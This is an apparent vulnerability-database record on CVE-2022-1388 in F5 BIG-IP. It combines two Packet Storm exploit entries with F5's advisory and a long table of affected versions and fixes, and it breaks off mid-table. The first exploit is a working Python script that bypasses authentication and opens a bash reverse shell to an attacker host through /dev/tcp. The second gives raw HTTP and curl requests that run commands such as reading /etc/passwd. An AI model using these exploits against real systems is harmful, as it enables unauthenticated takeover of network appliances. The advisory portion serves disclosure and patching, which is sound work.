"integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-05-12T00:00:00", "id": "PACKETSTORM:167118", "href": "https://packetstormsecurity.com/files/167118/F5-BIG-IP-16.0.x-Remote-Code-Execution.html", "sourceData": "`# Exploit Title: F5 BIG-IP 16.0.x - Remote Code Execution (RCE) \n# Exploit Author: Yesith Alvarez \n# Vendor Homepage: https://www.f5.com/products/big-ip-services \n# Version: 16.0.x \n# CVE : CVE-2022-1388 \n \nfrom requests import Request, Session \nimport sys \nimport json \n \n \n \ndef title(): \nprint(''' \n \n_______ ________ ___ ___ ___ ___ __ ____ ___ ___ \n/ ____\\ \\ / / ____| |__ \\ / _ \\__ \\|__ \\ /_ |___ \\ / _ \\ / _ \\ \n| | \\ \\ / /| |__ ______ ) | | | | ) | ) |_____| | __) | (_) | (_) | \n| | \\ \\/ / | __|______/ /| | | |/ / / /______| ||__ < > _ < > _ < \n| |____ \\ / | |____ / /_| |_| / /_ / /_ | |___) | (_) | (_) | \n\\_____| \\/ |______| |____|\\___/____|____| |_|____/ \\___/ \\___/ \n \n \n \nAuthor: Yesith Alvarez \nGithub: https://github.com/yealvarez \nLinkedin: https://www.linkedin.com/in/pentester-ethicalhacker/ \n''') \n \ndef exploit(url, lhost, lport): \nurl = url + 'mgmt/tm/util/bash' \ndata = { \n\"command\":\"run\", \n\"utilCmdArgs\":\"-c 'bash -i >& /dev/tcp/\"+lhost+\"/\"+lport+\" 0>&1'\" \n \n} \nheaders = { \n'Authorization': 'Basic YWRtaW46', \n'Connection':'keep-alive, X-F5-Auth-Token', \n'X-F5-Auth-Token': '0' \n \n} \ns = Session() \nreq = Request('POST', url, json=data, headers=headers) \nprepped = req.prepare() \ndel prepped.headers['Content-Type'] \nresp = s.send(prepped, \nverify=False, \ntimeout=15 \n) \n#print(prepped.headers) \n#print(url) \n#print(resp.headers) \n#print(resp.json()) \nprint(resp.status_code) \n \n \nif __name__ == '__main__': \ntitle() \nif(len(sys.argv) < 4): \nprint('[+] USAGE: python3 %s https://<target_url> lhost lport\\n'%(sys.argv[0])) \nprint('[+] USAGE: python3 %s https://192.168.0.10 192.168.0.11 4444\\n'%(sys.argv[0])) \nprint('[+] Do not forget to run the listener: nc -lvp 4444\\n') \nexit(0) \nelse: \nexploit(sys.argv[1],sys.argv[2],sys.argv[3]) \n \n \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/167118/f5bigip160x-exec.txt"}, {"lastseen": "2022-05-09T16:17:41", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-09T00:00:00", "type": "packetstorm", "title": "F5 BIG-IP Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-05-09T00:00:00", "id": "PACKETSTORM:167007", "href": "https://packetstormsecurity.com/files/167007/F5-BIG-IP-Remote-Code-Execution.html", "sourceData": "`# F5 BIG-IP RCE exploitation (CVE-2022-1388) \n \nPOST (1): \n \nPOST /mgmt/tm/util/bash HTTP/1.1 \nHost: <redacted>:8443 \nAuthorization: Basic YWRtaW46 \nConnection: keep-alive, X-F5-Auth-Token \nX-F5-Auth-Token: 0 \n \n{\"command\": \"run\" , \"utilCmdArgs\": \" -c 'id' \" } \n \ncurl commandliner: \n \n$ curl -i -s -k -X $'POST' \n-H $'Host: <redacted>:8443' \n-H $'Authorization: Basic YWRtaW46' \n-H $'Connection: keep-alive, X-F5-Auth-Token' \n-H $'X-F5-Auth-Token: 0' \n-H $'Content-Length: 52' \n--data-binary $'{\\\"command\\\": \\\"run\\\" , \\\"utilCmdArgs\\\": \\\" -c \\'id\\' \\\" }\\x0d\\x0a' \n$'https://<redacted>:8443/mgmt/tm/util/bash' --proxy http://127.0.0.1:8080 \n \n \nPOST (2): \n \nPOST /mgmt/tm/util/bash HTTP/1.1 \nHost: <redateced>:8443 \nAuthorization: Basic YWRtaW46 \nConnection: keep-alive, X-F5-Auth-Token \nX-F5-Auth-Token: 0 \n \n{\"command\": \"run\" , \"utilCmdArgs\": \" -c ' cat /etc/passwd' \" } \n \ncurl commandliner: \n \n$ curl -i -s -k -X $'POST' \n-H $'Host: <redacted>:8443' \n-H $'Authorization: Basic YWRtaW46' -H $'Connection: keep-alive, X-F5-Auth-Token' \n-H $'X-F5-Auth-Token: 0' \n--data-binary $'{\\\"command\\\": \\\"run\\\" , \\\"utilCmdArgs\\\": \\\" -c \\' cat /etc/passwd\\' \\\" }\\x0d\\x0a\\x0d\\x0a' \n$'https://<redacted>/mgmt/tm/util/bash' --proxy http://127.0.0.1:8080 \n \nNote: \n \nIssue could be related between frontend and backend authentication \"Jetty\" with empty credentials \"admin: <empty>\" \n+ value of headers ,see \"HTTP hop_by_hop request headers\"... \n \nReferences and Fixes : \n* https://support.f5.com/csp/article/K23605346 \n* https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1388 \n \nHere the documentation used latest nites: \n* https://clouddocs.f5.com/api/icontrol-rest/ \n \nHTTP hop_by_hop request headers: \n* https://portswigger.net/research/top-10-web-hacking-techniques-of-2019-nominations-open \n \n# Author \nAlex Hernandez aka @_alt3kx_ \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/167007/CVE-2022-1388-poc.txt"}], "f5": [{"lastseen": "2022-05-09T19:31:21", "description": "Undisclosed requests may bypass iControl REST authentication. ([CVE-2022-1388](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-1388>))\n\nImpact\n\nThis vulnerability may allow an unauthenticated attacker with network access to the BIG-IP system through the management port and/or self IP addresses to execute arbitrary system commands, create or delete files, or disable services. There is no data plane exposure; this is a control plane issue only.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-04T12:23:00", "type": "f5", "title": "BIG-IP iControl REST vulnerability CVE-2022-1388", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-05-09T18:32:00", "id": "F5:K23605346", "href": "https://support.f5.com/csp/article/K23605346", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-06T23:47:00", "description": "On May 4, 2022, F5 announced the following security issues. This document is intended to serve as an overview of these vulnerabilities and security exposures to help determine the impact to your F5 devices. You can find the details of each issue in the associated security advisory.\n\nDistributed Cloud and Managed Services\n\nService | Status \n---|--- \nF5 Distributed Cloud Services | Does not affect or has been resolved \nSilverline | Does not affect or has been resolved \nThreat Stack | Does not affect or has been resolved \n \n * [Critical CVEs](<https://support.f5.com/csp/article/K55879220#critical>)\n * [High CVEs](<https://support.f5.com/csp/article/K55879220#high>)\n * [Medium CVEs](<https://support.f5.com/csp/article/K55879220#medium>)\n * [Low CVEs](<https://support.f5.com/csp/article/K55879220#low>)\n * [Security Exposures](<https://support.f5.com/csp/article/K55879220#exposure>)\n\nCritical CVEs\n\nSecurity Advisory (CVE) | CVSS score | Affected products | Affected versions1 | Fixes introduced in \n---|---|---|---|--- \n[K23605346: BIG-IP iControl REST vulnerability CVE-2022-1388](<https://support.f5.com/csp/article/K23605346>) | 9.8 | BIG-IP (all modules) | 16.1.0 - 16.1.2 \n15.1.0 - 15.1.5 \n14.1.0 - 14.1.4 \n13.1.0 - 13.1.4 \n12.1.0 - 12.1.6 \n11.6.1 - 11.6.5 | 17.0.0 \n16.1.2.2 \n15.1.5.1 \n14.1.4.6 \n13.1.5 \n \n1F5 evaluates only software versions that have not yet reached the End of Technical Support (EoTS) phase of their lifecycle.\n\nHigh CVEs\n\nSecurity Advisory (CVE) | CVSS score | Affected products | Affected versions1 | Fixes introduced in \n---|---|---|---|--- \n[K52322100: Authenticated F5 BIG-IP Guided Configuration integrity check in Appliance mode vulnerability CVE-2022-25946](<https://support.f5.com/csp/article/K52322100>) | 8.7 - Appliance mode only | BIG-IP Guided Configuration | 3.0 - 8.0 | 9.0 \nBIG-IP (ASM, Advanced WAF, APM) | 16.1.0 - 16.1.2 \n15.1.0 - 15.1.5 \n14.1.0 - 14.1.4 \n13.1.0.8 - 13.1.5 | 17.0.0 \n[K68647001: Authenticated F5 BIG-IP Guided Configuration in Appliance mode vulnerability CVE-2022-27806](<https://support.f5.com/csp/article/K68647001>) | 8.7 - Appliance mode only | BIG-IP Guided Configuration | 3.0 - 8.0 | 9.0 \nBIG-IP (Advanced WAF, APM, ASM) | 16.1.0 - 16.1.2 \n15.1.0 - 15.1.5 \n14.1.0 - 14.1.4 \n13.1.0.8 - 13.1.5 | 17.0.0 \n[K70300233: BIG-IP TMUI XSS vulnerability CVE-2022-28707](<https://support.f5.com/csp/article/K70300233>) | 8.0 | BIG-IP (all modules) | 16.1.0 - 16.1.2 \n15.1.0 - 15.1.5 \n14.1.0 - 14.1.4 | 17.0.0 \n16.1.2.2 \n15.1.5.1 \n14.1.4.6 \n[K33552735: BIG-IP Edge Client for Windows vulnerability CVE-2022-29263](<https://support.f5.com/csp/article/K33552735>) | 7.8 | BIG-IP (APM) | 16.1.0 - 16.1.2 \n15.1.0 - 15.1.5 \n14.1.0 - 14.1.4 \n13.1.0 - 13.1.4 \n12.1.0 - 12.1.6 \n11.6.1 - 11.6.5 | 17.0.0 \n16.1.2.2 \n15.1.5.1 \n14.1.4.6 \n13.1.5 \nBIG-IP APM Clients | 7.1.8 - 7.2.1 | 7.2.2 \n7.2.1.5 \n[K81952114: Authenticated iControl REST in Appliance mode vulnerability CVE-2022-26415](<https://support.f5.com/csp/article/K81952114>) | 7.7 - Appliance mode only | BIG-IP (all modules) | 16.1.0 - 16.1.2 \n15.1.0 - 15.1.5 \n14.1.0 - 14.1.4 \n13.1.0 - 13.1.4 \n12.1.0 - 12.1.6 | 17.0.0 \n16.1.2.2 \n15.1.5.1 \n14.1.4.6 \n13.1.5 \n[K23454411: DNS profile vulnerability CVE-2022-26372](<https://support.f5.com/csp/article/K23454411>) | 7.5 | BIG-IP (all modules) | 15.1.0 \n14.1.0 - 14.1.4 \n13.1.0 - 13.1.4 \n12.1.0 - 12.1.6 \n11.6.1 - 11.6.5 | 16.0.0 \n15.1.0.2 \n14.1.4.6 \n13.1.5 \n[K25451853: TMUI XSS vulnerability CVE-2022-28716](<https://support.f5.com/csp/article/K25451853>) | 7.5 | BIG-IP (AFM, CGNAT, PEM) | 16.1.0 - 16.1.2 \n15.1.0 - 15.1.5 \n14.1.0 - 14.1.4 \n13.1.0 - 13.1.4 \n12.1.0 - 12.1.6 \n11.6.1 - 11.6.5 | 17.0.0 \n16.1.2.2 \n15.1.5.1 \n14.1.4.6 \n13.1.5 \n[K16187341: BIG-IP ICAP profile vulnerability CVE-2022-27189](<https://support.f5.com/csp/article/K16187341>) | 7.5 | BIG-IP (all modules) | 16.1.0 - 16.1.2 \n15.1.0 - 15.1.5 \n14.1.0 - 14.1.4 \n13.1.0 - 13.1.4 \n12.1.0 - 12.1.6 \n11.6.1 - 11.6.5 | 17.0.0 \n16.1.2.2 \n15.1.5.1 \n14.1.4.6 \n13.1.5 \n[K21317311: F5 BIG-IP Guided Configuration XSS vulnerability CVE-2022-27230](<https://support.f5.com/csp/article/K21317311>) | 7.5 | BIG-IP Guided Configuration | 3.0 - 8.0 | 9.0 \nBIG-IP (APM) | 16.1.0 - 16.1.2 \n15.1.0 - 15.1.5 \n14.1.0 - 14.1.4 \n13.1.0.8 - 13.1.5 | 17.0.0 \n[K37155600: BIG-IP RTSP profile vulnerability CVE-2022-28691](<https://support.f5.com/csp/article/K37155600>) | 7.5 | BIG-IP (all modules) | 16.1.0 - 16.1.2 \n15.1.0 - 15.1.4 \n14.1.0 - 14.1.4 \n13.1.0 - 13.1.4 | 17.0.0 \n16.1.2.2 \n15.1.5 \n14.1.4.6 \n13.1.5 \n[K14229426: BIG-IP SSL vulnerability CVE-2022-29491](<https://support.f5.com/csp/article/K14229426>) | 7.5 | BIG-IP (LTM, Advanced WAF, ASM, APM) | 16.1.0 - 16.1.2 \n15.1.0 - 15.1.4 \n14.1.0 - 14.1.4 \n13.1.0 - 13.1.5 \n12.1.0 - 12.1.6 \n11.6.1 - 11.6.5 | 17.0.0 \n16.1.2.2 \n15.1.5 \n14.1.4.6 \n[K52340447: F5 ePVA vulnerability CVE-2022-28705](<https://support.f5.com/csp/article/K52340447>) | 7.5 | BIG-IP (all modules) | 16.1.0 - 16.1.2 \n15.1.0 - 15.1.5 \n14.1.0 - 14.1.4 \n13.1.0 - 13.1.4 | 17.0.0 \n16.1.2.2 \n15.1.5.1 \n14.1.4.6 \n13.1.5 \n[K03442392: BIG-IP ASM and F5 Advanced WAF vulnerability CVE-2022-26890](<https://support.f5.com/csp/article/K03442392>) | 7.5 | BIG-IP (ASM, Advanced WAF, APM) | 16.1.0 - 16.1.2 \n15.1.0 - 15.1.4 \n14.1.0 - 14.1.4 \n13.1.0 - 13.1.4 | 17.0.0 \n16.1.2.1 \n15.1.5 \n14.1.4.6 \n13.1.5 \n[K99123750: BIG-IP Stream profile vulnerability CVE-2022-28701](<https://support.f5.com/csp/article/K99123750>) | 7.5 | BIG-IP (all modules) | 16.1.0 - 16.1.2 | 17.0.0 \n16.1.2.2 \n[K41440465: BIG-IP TMM vulnerability CVE-2022-26071](<https://support.f5.com/csp/article/K41440465>) | 7.4 | BIG-IP (all modules) | 16.1.0 - 16.1.2 \n15.1.0 - 15.1.5 \n14.1.0 - 14.1.4 \n13.1.0 - 13.1.4 \n12.1.0 - 12.1.6 \n11.6.1 - 11.6.5 | 17.0.0 \n16.1.2.2 \n15.1.5.1 \n14.1.4.6 \n13.1.5 \n[K54460845: BIG-IP Edge Client for Windows vulnerability CVE-2022-28714](<https://support.f5.com/csp/article/K54460845>) | 7.3 | BIG-IP (APM) | 16.1.0 - 16.1.2 \n15.1.0 - 15.1.5 \n14.1.0 - 14.1.4 \n13.1.0 - 13.1.4 \n12.1.0 - 12.1.6 \n11.6.1 - 11.6.5 | 17.0.0 \n16.1.2.2 \n15.1.5.1 \n14.1.4.6 \n13.1.5 \nBIG-IP APM Clients | 7.2.1 - 7.2.1 \n7.1.6 - 7.1.9 | 7.2.2 \n7.2.1.5 \n[K08510472: BIG-IP TMUI vulnerability CVE-2022-28695](<https://support.f5.com/csp/article/K08510472>) | 7.2 - Standard deployment mode | BIG-IP (AFM) | 16.1.0 - 16.1.2 \n15.1.0 - 15.1.5 \n14.1.0 - 14.1.4 \n13.1.0 - 13.1.4 | 17.0.0 \n16.1.2.2 \n15.1.5.1 \n14.1.4.6 \n13.1.5 \n9.1 - Appliance mode \n \n1F5 evaluates only software versions that have not yet reached the End of Technical Support (EoTS) phase of their lifecycle.\n\nMedium CVEs\n\nSecurity Advisory (CVE) | CVSS score | Affected products | Affected versions1 | Fixes introduced in \n---|---|---|---|--- \n[K92807525: TMUI XSS vulnerability CVE-2022-27878](<https://support.f5.com/csp/article/K92807525>) | 6.8 | BIG-IP Guided Configuration | 6.0 - 8.0 | 9.0 \nBIG-IP (all modules) | 16.0.0 - 16.1.2 \n15.1.0 - 15.1.5 \n14.1.0 - 14.1.4 \n13.1.0.4 - 13.1.5 | 17.0.0 \n[K94093538: NGINX Service Mesh control plane vulnerability CVE-2022-27495](<https://support.f5.com/csp/article/K94093538>) | 6.5 | NGINX Service Mesh | 1.3.0 - 1.3.1 | 1.4.0 \n[K57555833: BIG-IP APM vulnerability CVE-2022-27634](<https://support.f5.com/csp/article/K57555833>) | 6.5 | BIG-IP (APM) | 16.1.0 - 16.1.2 \n15.1.0 - 15.1.5 | 17.0.0 \n16.1.2.2 \n15.1.5.1 \n[K47662005: BIG-IP Net HSM script vulnerability CVE-2022-28859](<https://support.f5.com/csp/article/K47662005>) | 6.5 | BIG-IP (all modules) | 16.0.0 - 16.0.1 \n15.1.0 - 15.1.5 \n14.1.0 - 14.1.4 | 17.0.0 \n16.1.0 \n15.1.5.1 \n14.1.4.6 \n[K06323049: BIG-IP IPsec ALG vulnerability CVE-2022-29473](<https://support.f5.com/csp/article/K06323049>) | 5.9 | BIG-IP (all modules) | 15.1.0 - 15.1.5 \n14.1.0 - 14.1.4 \n13.1.0 - 13.1.4 | 16.1.0 \n15.1.5.1 \n14.1.4.5 \n13.1.5 \n[K51539421: BIG-IP SIP ALG profile vulnerability CVE-2022-26370](<https://support.f5.com/csp/article/K51539421>) | 5.9 | BIG-IP (all modules) | 16.1.0 - 16.1.2 \n15.1.0 - 15.1.4 \n14.1.0 - 14.1.4 | 17.0.0 \n16.1.2.2 \n15.1.5 \n14.1.4.6 \n[K54082580: BIG-IP CGNAT LSN vulnerability CVE-2022-26517](<https://support.f5.com/csp/article/K54082580>) | 5.9 | BIG-IP (all modules) | 16.0.0 - 16.0.1 \n15.1.0 - 15.1.5 \n14.1.0 - 14.1.4 \n13.1.0 - 13.1.4 | 17.0.0 \n16.1.0 \n15.1.5.1 \n14.1.4.6 \n13.1.5 \n[K03755971: BIG-IP DNS resolver vulnerability CVE-2022-28706](<https://support.f5.com/csp/article/K03755971>) | 5.9 | BIG-IP (all modules) | 16.0.0 - 16.1.1 \n15.1.0 - 15.1.5 | 17.0.0 \n16.1.2 \n15.1.5.1 \n[K85054496: BIG-IP DNS resolver vulnerability CVE-2022-28708](<https://support.f5.com/csp/article/K85054496>) | 5.9 | BIG-IP (all modules) | 16.1.0 - 16.1.2 \n15.1.0 - 15.1.5 | 17.0.0 \n16.1.2.2 \n15.1.5.1 \n[K40019131: F5 Access for Android vulnerability CVE-2022-27875](<https://support.f5.com/csp/article/K40019131>) | 5.5 | F5 Access for Android | 3.0.6 - 3.0.7 | 3.0.8 \n[K57110035: BIG-IP APM Edge client for Windows logging vulnerability CVE-2022-27636](<https://support.f5.com/csp/article/K57110035>) | 5.5 | BIG-IP (APM) | 16.1.0 - 16.1.2 \n15.1.0 - 15.1.5 \n14.1.0 - 14.1.4 \n13.1.0 - 13.1.4 \n12.1.0 - 12.1.6 \n11.6.1 - 11.6.5 | 17.0.0 \n16.1.2.2 \n15.1.5.1 \n14.1.4.6 \n13.1.5 \nBIG-IP APM Clients | 7.1.6 - 7.2.1 | 7.2.1.5 \n[K44233515: F5OS-A vulnerability CVE-2022-25990](<https://support.f5.com/csp/article/K44233515>) | 5.3 | F5OS-A | 1.0.0 | 1.0.1 \n[K82034427: BIG-IP FTP profile vulnerability CVE-2022-26130](<https://support.f5.com/csp/article/K82034427>) | 5.3 | BIG-IP (all modules) | 16.1.0 - 16.1.2 \n15.1.0 - 15.1.5 \n14.1.0 - 14.1.4 \n13.1.0 - 13.1.4 | 17.0.0 \n16.1.2.2 \n15.1.5.1 \n14.1.4.6 \n13.1.5 \n[K71103363: BIG-IP big3d vulnerability CVE-2022-29480](<https://support.f5.com/csp/article/K71103363>) | 5.3 | BIG-IP (all modules) | 13.1.0 - 13.1.4 \n12.1.0 - 12.1.6 \n11.6.1 - 11.6.5 | 14.0.0 \n13.1.5 \n[K64124988: TMM IPv6 stack vulnerability CVE-2022-29479](<https://support.f5.com/csp/article/K64124988>) | 5.3 | BIG-IP (all modules) | 16.0.0 - 16.0.1 \n15.1.0 - 15.1.5 \n14.1.0 - 14.1.4 \n13.1.0 - 13.1.4 \n12.1.0 - 12.1.6 \n11.6.1 - 11.6.5 | 17.0.0 \n16.1.0 \n15.1.5.1 \n14.1.4.6 \n13.1.5 \nBIG-IQ Centralized Management | 8.0.0 - 8.2.0 \n7.0.0 - 7.1.0 | None \n[K31856317: BIG-IP Packet Filters vulnerability CVE-2022-27182](<https://support.f5.com/csp/article/K31856317>) | 5.3 | BIG-IP (all modules) | 16.1.0 - 16.1.2 \n15.1.0 - 15.1.5 \n14.1.0 - 14.1.4 | 17.0.0 \n16.1.2.2 \n15.1.5.1 \n14.1.4.6 \n[K93543114: BIG-IP APM vulnerability CVE-2022-27181](<https://support.f5.com/csp/article/K93543114>) | 5.3 | BIG-IP (APM) | 16.1.0 - 16.1.2 \n15.1.0 - 15.1.5 \n14.1.0 - 14.1.4 \n13.1.0 - 13.1.4 \n12.1.0 - 12.1.6 \n11.6.1 - 11.6.5 | 17.0.0 \n16.1.2.2 \n15.1.5.1 \n14.1.4.6 \n13.1.5 \n[K53197140: BIG-IP iControl REST and tmsh vulnerabilities CVE-2022-26835](<https://support.f5.com/csp/article/K53197140>) | 4.9 - Standard deployment mode | BIG-IP (all modules) | 16.1.0 - 16.1.2 \n15.1.0 - 15.1.5 \n14.1.0 - 14.1.4 \n13.1.0 - 13.1.4 \n12.1.0 - 12.1.6 \n11.6.1 - 11.6.5 | 17.0.0 \n16.1.2.2 \n15.1.5.1 \n14.1.4.6 \n13.1.5 \n6.8 - Appliance mode \n[K38271531: BIG-IP and BIG-IQ SCP vulnerability CVE-2022-26340](<https://support.f5.com/csp/article/K38271531>) | 4.9 | BIG-IP (all modules) | 16.0.0 - 16.1.2 \n15.1.0 - 15.1.5 \n14.1.0 - 14.1.4 \n13.1.0 - 13.1.4 \n12.1.0 - 12.1.6 \n11.6.1 - 11.6.5 | 17.0.0 \n16.1.2.2 \n15.1.5.1 \n14.1.4.6 \n13.1.5 \nBIG-IQ Centralized Management | 8.0.0 - 8.2.0 \n7.0.0 - 7.1.0 | None \n[K24248011: Traffix SDC Configuration utility vulnerability CVE-2022-27662](<https://support.f5.com/csp/article/K24248011>) | 4.8 | Traffix SDC | 5.2.0 \n5.1.0 | 5.2.2 \n5.1.35 \n[K17341495: Traffix SDC Configuration utility vulnerability CVE-2022-27880](<https://support.f5.com/csp/article/K17341495>) | 4.8 | Traffix SDC | 5.2.0 \n5.1.0 | 5.2.2 \n5.1.35 \n[K15101402: iControl REST vulnerability CVE-2022-1468](<https://support.f5.com/csp/article/K15101402>) | 4.3 | BIG-IP (all modules) | 17.0.0 \n16.1.0 - 16.1.2 \n15.1.0 - 15.1.5 \n14.1.0 - 14.1.4 \n13.1.0 - 13.1.5 \n12.1.0 - 12.1.6 \n11.6.1 - 11.6.5 | None \n[K41877405: BIG-IP TMUI vulnerability CVE-2022-27659](<https://support.f5.com/csp/article/K41877405>) | 4.3 | BIG-IP (all modules) | 16.1.0 - 16.1.2 \n15.1.0 - 15.1.5 \n14.1.0 - 14.1.4 | 17.0.0 \n16.1.2.2 \n15.1.5.1 \n14.1.4.6 \n[K59904248: iControl SOAP vulnerability CVE-2022-29474](<https://support.f5.com/csp/article/K59904248>) | 4.3 | BIG-IP (all modules) | 16.1.0 - 16.1.2 \n15.1.0 - 15.1.5 \n14.1.0 - 14.1.4 \n13.1.0 - 13.1.4 \n12.1.0 - 12.1.6 \n11.6.1 - 11.6.5 | 17.0.0 \n16.1.2.2 \n15.1.5.1 \n14.1.4.6 \n13.1.5 \n \n1F5 evaluates only software versions that have not yet reached the End of Technical Support (EoTS) phase of their lifecycle.\n\nLow CVEs\n\nSecurity Advisory (CVE) | CVSS score | Affected products | Affected versions1 | Fixes introduced in \n---|---|---|---|--- \n[K49905324: BIG-IP TMUI CSRF vulnerability CVE-2022-1389](<https://support.f5.com/csp/article/K49905324>) | 3.1 | BIG-IP (all modules) | 16.1.0 - 16.1.2 \n15.1.0 - 15.1.5 \n14.1.0 - 14.1.4 \n13.1.0 - 13.1.5 \n12.1.0 - 12.1.6 \n11.6.1 - 11.6.5 | 17.0.0 \n \n1F5 evaluates only software versions that have not yet reached the End of Technical Support (EoTS) phase of their lifecycle.\n\nSecurity Exposures\n\nSecurity Advisory (Exposure) | Affected products | Affected versions1 | Fixes introduced in \n---|---|---|--- \n[K68816502: A BIG-IP LTM policy referencing an external data group may not match traffic](<https://support.f5.com/csp/article/K68816502>) | BIG-IP (all modules) | 16.1.0 - 16.1.2 \n15.1.0 - 15.1.5 \n14.1.0 - 14.1.4 \n13.1.0 - 13.1.5 \n12.1.0 - 12.1.6 \n11.6.1 - 11.6.5 | 17.0.0 \n16.1.2.2 \n15.1.5.1 \n14.1.4.6 \n[K74302282: BIG-IP APM RDP resource security exposure](<https://support.f5.com/csp/article/K74302282>) | BIG-IP (APM) | 16.1.0 - 16.1.2 \n15.1.0 - 15.1.5 \n14.1.0 - 14.1.4 \n13.1.0 - 13.1.4 \n12.1.0 - 12.1.6 \n11.6.1 - 11.6.5 | 17.0.0 \n16.1.2.2 \n15.1.5.1 \n14.1.4.6 \n13.1.5 \n[K70134152: BIG-IP ASM, F5 Advanced WAF, and NGINX App Protect encoded directory traversal security exposure](<https://support.f5.com/csp/article/K70134152>) | BIG-IP (Advanced WAF, ASM) | 16.1.0 \n15.1.0 - 15.1.3 \n14.1.0 - 14.1.4 \n13.1.0 - 13.1.4 \n12.1.0 - 12.1.6 \n11.6.1 - 11.6.5 | 17.0.0 \n16.1.1 \n15.1.4 \n14.1.4.4 \n13.1.5 \nNGINX App Protect | 3.0.0 - 3.6.0 \n2.0.0 - 2.3.0 \n1.0.0 - 1.3.0 | 3.7.0 \n[K80945213: BIG-IP ASM and F5 Advanced WAF attack signature check failure security exposure](<https://support.f5.com/csp/article/K80945213>) | BIG-IP (Advanced WAF, ASM) | 15.1.0 - 15.1.4 \n14.1.0 - 14.1.4 \n13.1.0 - 13.1.4 \n12.1.0 - 12.1.6 \n11.6.1 - 11.6.5 | 16.1.0 \n15.1.4.1 \n14.1.4.4 \n13.1.5 \n[K67397230: BIG-IP ASM, F5 Advanced WAF, and NGINX App Protect normalizing security exposure](<https://support.f5.com/csp/article/K67397230>) | BIG-IP (Advanced WAF, ASM) | 16.1.0 - 16.1.2 \n15.1.0 - 15.1.4 \n14.1.0 - 14.1.4 | 17.0.0 \n16.1.2.1 \n15.1.5 \n14.1.4.6 \nNGINX App Protect | 3.0.0 - 3.6.0 \n2.0.0 - 2.3.0 \n1.0.0 - 1.3.0 | 3.7.0 \n[K53593534: BIG-IP ASM and F5 Advanced WAF attack signature check failure on certain HTTP requests](<https://support.f5.com/csp/article/K53593534>) | BIG-IP (Advanced WAF, ASM) | 16.1.0 - 16.1.2 \n15.1.0 - 15.1.5 \n14.1.0 - 14.1.4 \n13.1.0 - 13.1.4 \n12.1.0 - 12.1.6 \n11.6.1 - 11.6.5 | 17.0.0 \n16.1.2.2 \n15.1.5.1 \n14.1.4.6 \n13.1.5 \n[K39002226: F5 Advanced WAF and BIG-IP ASM multipart request security exposure](<https://support.f5.com/csp/article/K39002226>) | BIG-IP (Advanced WAF, ASM) | 16.1.0 - 16.1.2 \n15.1.0 - 15.1.5 \n14.1.0 - 14.1.4 \n13.1.0 - 13.1.4 \n12.1.0 - 12.1.6 \n11.6.1 - 11.6.5 | 17.0.0 \n16.1.2.2 \n15.1.5.1 \n14.1.4.6 \n13.1.5 \n[K94142349: BIG-IP Advanced WAF and ASM WebSocket security exposure](<https://support.f5.com/csp/article/K94142349>) | BIG-IP (Advanced WAF, ASM) | 16.1.0 - 16.1.2 \n15.1.0 - 15.1.5 \n14.1.0 - 14.1.4 \n13.1.0 - 13.1.4 \n12.1.0 - 12.1.6 | 17.0.0 \n16.1.2.2 \n15.1.5.1 \n14.1.4.6 \n13.1.5 \n[K85021277: BIG-IP DNSSEC security exposure](<https://support.f5.com/csp/article/K85021277>) | BIG-IP (DNS) | 16.1.0 - 16.1.2 \n15.1.0 - 15.1.5 \n14.1.0 - 14.1.4 \n13.1.0 - 13.1.4 \n12.1.0 - 12.1.6 \n11.6.1 - 11.6.5 | 17.0.0 \n16.1.2.2 \n15.1.5.1 \n14.1.4.6 \n13.1.5 \n[K92306170: BIG-IP AFM single endpoint flood/sweep DoS vector security exposure ](<https://support.f5.com/csp/article/K92306170>) | BIG-IP (AFM) | 